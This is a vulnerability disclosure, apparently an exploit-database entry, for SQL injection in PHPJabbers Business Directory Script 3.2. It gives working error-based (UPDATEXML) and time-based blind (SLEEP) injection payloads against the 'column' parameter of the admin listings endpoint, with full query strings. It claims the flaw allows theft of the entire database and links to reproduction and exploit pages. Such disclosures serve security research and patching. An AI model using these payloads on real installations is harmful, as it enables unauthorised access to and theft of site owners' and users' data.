<pre><code>## Title: Business-Directory-Script-3.2 SQLi<br />## Author: nu11secur1ty<br />## Date: 08/25/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `column` parameter appears to be vulnerable to SQL injection<br />attacks. The payload ' was submitted in the column parameter, and a<br />database error message was returned. You should review the contents of<br />the error message, and the application's handling of other input, to<br />confirm whether a vulnerability is present. Additionally, the payload<br />(select*from(select(sleep(20)))a) was submitted in the column<br />parameter. The application took 20271 milliseconds to respond to the<br />request, compared with 230 milliseconds for the original request,<br />indicating that the injected SQL command caused a time delay. The<br />attacker can steal all information from the database of the server of<br />this application!<br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: column (GET)<br /> Type: error-based<br /> Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)<br /> Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT<br />(ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)<br /> Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT<br />6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html)<br /><br />## Time spend:<br />01:35:00<br /><br /><br /></code></pre>